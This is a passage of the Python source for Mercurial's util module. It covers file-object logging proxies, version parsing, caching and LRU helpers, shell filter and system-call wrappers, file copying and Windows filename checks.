500 universal_newlines=newlines,
501 env=env)
502 return p.stdin, p.stdout, p.stderr, p
503
504 class fileobjectproxy(object):
505 """A proxy around file objects that tells a watcher when events occur.
506
507 This type is intended to only be used for testing purposes. Think hard
508 before using it in important code.
509 """
510 __slots__ = (
511 r'_orig',
512 r'_observer',
513 )
514
515 def __init__(self, fh, observer):
516 object.__setattr__(self, r'_orig', fh)
517 object.__setattr__(self, r'_observer', observer)
518
519 def __getattribute__(self, name):
520 ours = {
521 r'_observer',
522
523 # IOBase
524 r'close',
525 # closed if a property
526 r'fileno',
527 r'flush',
528 r'isatty',
529 r'readable',
530 r'readline',
531 r'readlines',
532 r'seek',
533 r'seekable',
534 r'tell',
535 r'truncate',
536 r'writable',
537 r'writelines',
538 # RawIOBase
539 r'read',
540 r'readall',
541 r'readinto',
542 r'write',
543 # BufferedIOBase
544 # raw is a property
545 r'detach',
546 # read defined above
547 r'read1',
548 # readinto defined above
549 # write defined above
550 }
551
552 # We only observe some methods.
553 if name in ours:
554 return object.__getattribute__(self, name)
555
556 return getattr(object.__getattribute__(self, r'_orig'), name)
557
558 def __delattr__(self, name):
559 return delattr(object.__getattribute__(self, r'_orig'), name)
560
561 def __setattr__(self, name, value):
562 return setattr(object.__getattribute__(self, r'_orig'), name, value)
563
564 def __iter__(self):
565 return object.__getattribute__(self, r'_orig').__iter__()
566
567 def _observedcall(self, name, *args, **kwargs):
568 # Call the original object.
569 orig = object.__getattribute__(self, r'_orig')
570 res = getattr(orig, name)(*args, **kwargs)
571
572 # Call a method on the observer of the same name with arguments
573 # so it can react, log, etc.
574 observer = object.__getattribute__(self, r'_observer')
575 fn = getattr(observer, name, None)
576 if fn:
577 fn(res, *args, **kwargs)
578
579 return res
580
581 def close(self, *args, **kwargs):
582 return object.__getattribute__(self, r'_observedcall')(
583 r'close', *args, **kwargs)
584
585 def fileno(self, *args, **kwargs):
586 return object.__getattribute__(self, r'_observedcall')(
587 r'fileno', *args, **kwargs)
588
589 def flush(self, *args, **kwargs):
590 return object.__getattribute__(self, r'_observedcall')(
591 r'flush', *args, **kwargs)
592
593 def isatty(self, *args, **kwargs):
594 return object.__getattribute__(self, r'_observedcall')(
595 r'isatty', *args, **kwargs)
596
597 def readable(self, *args, **kwargs):
598 return object.__getattribute__(self, r'_observedcall')(
599 r'readable', *args, **kwargs)
600
601 def readline(self, *args, **kwargs):
602 return object.__getattribute__(self, r'_observedcall')(
603 r'readline', *args, **kwargs)
604
605 def readlines(self, *args, **kwargs):
606 return object.__getattribute__(self, r'_observedcall')(
607 r'readlines', *args, **kwargs)
608
609 def seek(self, *args, **kwargs):
610 return object.__getattribute__(self, r'_observedcall')(
611 r'seek', *args, **kwargs)
612
613 def seekable(self, *args, **kwargs):
614 return object.__getattribute__(self, r'_observedcall')(
615 r'seekable', *args, **kwargs)
616
    def tell(self, *args, **kwargs):
        # forwarded through _observedcall so the observer sees this call
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)
620
    def truncate(self, *args, **kwargs):
        # forwarded through _observedcall so the observer sees this call
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)
624
    def writable(self, *args, **kwargs):
        # forwarded through _observedcall so the observer sees this call
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)
628
    def writelines(self, *args, **kwargs):
        # forwarded through _observedcall so the observer sees this call
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)
632
    def read(self, *args, **kwargs):
        # forwarded through _observedcall so the observer sees this call
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)
636
    def readall(self, *args, **kwargs):
        # forwarded through _observedcall so the observer sees this call
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)
640
    def readinto(self, *args, **kwargs):
        # forwarded through _observedcall so the observer sees this call
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)
644
    def write(self, *args, **kwargs):
        # forwarded through _observedcall so the observer sees this call
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)
648
    def detach(self, *args, **kwargs):
        # forwarded through _observedcall so the observer sees this call
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)
652
    def read1(self, *args, **kwargs):
        # forwarded through _observedcall so the observer sees this call
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)
656
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        # refill via the base class, then report the low-level read to the
        # observer's 'osread' hook (if it defines one)
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res
696
# Map each byte to a printable escaped form; default is '\xNN', with
# shorter, readable overrides for backslash, CR and LF.
DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
DATA_ESCAPE_MAP.update({
    b'\\': b'\\\\',
    b'\r': br'\r',
    b'\n': br'\n',
})
# Bytes that need escaping when logged: control bytes, backslash, DEL and
# non-ASCII (tab \x09 is left as-is).
DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
704
def escapedata(s):
    """Return ``s`` with unprintable bytes replaced by escape sequences."""
    def _escapebyte(match):
        return DATA_ESCAPE_MAP[match.group(0)]
    return DATA_ESCAPE_RE.sub(_escapebyte, s)
707
class fileobjectobserver(object):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False):
        # fh is the file-like object log lines are written to; name is a
        # prefix identifying the observed object in the log output;
        # logdata additionally logs the (escaped) transferred payload
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.reads = reads
        self.writes = writes

    def _writedata(self, data):
        # finish the current log line, optionally appending the payload
        if not self.logdata:
            self.fh.write('\n')
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            self.fh.write(': %s\n' % escapedata(data))
            return

        # Data with newlines is written to multiple lines.
        self.fh.write(':\n')
        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n' % (self.name, escapedata(line)))

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
        self._writedata(res)

    def write(self, res, data):
        if not self.writes:
            return

        self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        self.fh.write('%s> bufferedread(%d) -> %d' % (
            self.name, size, len(res)))
        self._writedata(res)

    def bufferedreadline(self, res):
        self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
        self._writedata(res)
772
def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False):
    """Turn a file object into a logging file object."""

    return fileobjectproxy(fh,
                           fileobjectobserver(logh, name, reads=reads,
                                              writes=writes,
                                              logdata=logdata))
780
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        return 'unknown'
    return __version__.version
788
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split the numeric part from the "extra" suffix at the first '+' or '-'.
    # Use a raw pattern: the previous '[\+-]' relied on the invalid string
    # escape '\+' (deprecated since Python 3.6); '+' needs no escaping
    # inside a character class.
    parts = remod.split(r'[+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    # Collect leading integer components; stop at the first non-numeric one
    # (e.g. 'rc' in '3.9-rc').
    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
857
# NOTE: the date-parsing constants that used to live here ("defaultdateformats"
# and "extendeddateformats", used by parsedate) were extracted to
# mercurial/utils/dateutil.py in this change.
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # no arguments: a one-slot list is enough to remember the result
        memo = []
        def f():
            if not memo:
                memo.append(func())
            return memo[0]
        return f
    memo = {}
    if argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in memo:
                memo[arg] = func(arg)
            return memo[arg]
    else:
        def f(*args):
            if args not in memo:
                memo[args] = func(*args)
            return memo[args]

    return f
925
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        pending = getattr(self, '_copied', 0)
        if not pending:
            return self
        self._copied = pending - 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self
943
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # drop any existing entry first so the key moves to the end,
        # preserving "last-set" iteration order
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for key, value in src:
                self[key] = value
968
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    The doctests below demonstrate the sharing: copies are the same object
    until preparewrite() is called.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
994
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict (last-set key ordering)

    Be sure to call d = d.preparewrite() before writing to d.
    """
1000
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # commit only on a clean exit; release() always runs afterwards
        succeeded = exc_type is None
        try:
            if succeeded:
                self.close()
        finally:
            self.release()
1025
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # still close (commit) the transaction even though the
        # interruption propagates to the caller
        tr.close()
        raise
    finally:
        # any other exception leaves the transaction unclosed, so
        # release() aborts it
        tr.release()
1043
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing on enter or exit."""
    yield
1047
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        # key stays the _notset sentinel while the node holds no entry
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
1066
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        # backing store mapping key -> linked-list node
        self._cache = {}

        # one-node circular list; grows lazily up to ``max`` nodes
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        # note: unlike __getitem__, does not update recency
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        # empty every populated node; the circular list itself is kept
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        """Return a new lrucachedict with the same entries and ordering."""
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
1225
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            try:
                result = cache[arg]
            except KeyError:
                # miss: evict the least recently used entry once the
                # cache grows past 20 items, then compute
                if len(cache) > 20:
                    del cache[order.popleft()]
                result = cache[arg] = func(arg)
            else:
                # hit: refresh the key's position in the recency queue
                order.remove(arg)
            order.append(arg)
            return result
    else:
        def f(*args):
            try:
                result = cache[args]
            except KeyError:
                if len(cache) > 20:
                    del cache[order.popleft()]
                result = cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return result

    return f
1252
class propertycache(object):
    """Non-data descriptor caching the computed value in the instance dict.

    After the first access the cached value shadows the descriptor, so
    ``func`` runs at most once per instance (unless cleared).
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1265
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    obj.__dict__.pop(prop, None)
1270
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    out, _discarded = proc.communicate(s)
    return out
1277
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            # on OpenVMS a set low bit in the status is treated as success
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort removal of both temporary files
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
1311
# maps a command prefix to the filter strategy used by filter() below
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
    }
1316
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    for prefix, filterfn in filtertable.iteritems():
        if cmd.startswith(prefix):
            return filterfn(s, cmd[len(prefix):].lstrip())
    # no explicit strategy prefix: default to a pipe
    return pipefilter(s, cmd)
1323
def binary(s):
    """return true if a string is binary data"""
    if not s:
        return False
    return '\0' in s
1327
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def floorlog2(x):
        # floor(log2(x)), with 0 mapped to 0
        if not x:
            return 0
        bits = 0
        while x:
            x >>= 1
            bits += 1
        return bits - 1

    pending = []
    pendinglen = 0
    for piece in source:
        pending.append(piece)
        pendinglen += len(piece)
        if pendinglen < min:
            continue
        if min < max:
            # grow the threshold: at least double, or the largest power
            # of two not exceeding what we just accumulated
            min = min << 1
            rounded = 1 << floorlog2(pendinglen)
            if rounded > min:
                min = rounded
            if min > max:
                min = max
        yield ''.join(pending)
        pending = []
        pendinglen = 0
    if pending:
        yield ''.join(pending)
1358
1359 Abort = error.Abort
1360
def always(fn):
    """Predicate that matches anything: ignores ``fn``, returns True."""
    return True
1363
def never(fn):
    """Predicate that matches nothing: ignores ``fn``, returns False."""
    return False
1366
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # only re-enable if the collector was running before the call
            if wasenabled:
                gc.enable()
    return wrapper
1389
1390 if pycompat.ispypy:
1391 # PyPy runs slower with gc disabled
1392 nogc = lambda x: x
1393
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives: no relative path exists, return n2 under root
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # strip the common leading components shared by both paths
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # climb out of what remains of n1, then descend into n2
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1419
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    # checked in order: new py2exe, old py2exe, then tools/freeze
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1429
1430 # the location of data files matching the source code
1431 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1432 # executable version (py2exe) doesn't support __file__
1433 datapath = os.path.dirname(pycompat.sysexecutable)
1434 else:
1435 datapath = os.path.dirname(pycompat.fsencode(__file__))
1436
1437 i18n.setdatapath(datapath)
1438
1439 _hgexecutable = None
1440
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    # the result is computed once and cached in the module-level
    # _hgexecutable via _sethgexecutable()
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            # explicit override through the HG environment variable
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # __main__ is an 'hg' script: use it directly
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            # fall back to searching the PATH, then argv[0]
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1464
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    # updates the module-level cache read by hgexecutable()
    global _hgexecutable
    _hgexecutable = path
1469
1470 def _isstdout(f):
1471 fileno = getattr(f, 'fileno', None)
1472 try:
1473 return fileno and fileno() == sys.__stdout__.fileno()
1474 except io.UnsupportedOperation:
1475 return False # fileno() raised UnsupportedOperation
1476
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        # None/False -> '0', True -> '1', everything else stringified
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return pycompat.bytestr(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    # expose the path of the running hg executable as $HG
    env['HG'] = hgexecutable()
    return env
1491
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # out is the real stdout: let the child write to it directly
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # capture the child's combined stdout/stderr and copy it to out
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        # on OpenVMS a set low bit in the status is treated as success
        rc = 0
    return rc
1518
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # a traceback depth of 1 means the TypeError was raised by the
            # call itself (a signature mismatch), not from inside func
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check
1530
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1546
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the stat of the existing dest so mtime ambiguity
            # with the copied file can be detected below
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1598
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible.

    Returns (hardlink, num): whether hardlinking remained possible, and
    the number of files copied.
    """
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # hardlinks only work within one filesystem: compare devices
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # linking failed: degrade to plain copies from here on
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1638
# device names that are reserved on Windows and can't be used as the base
# of a file name, plus the characters that are invalid in file names
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
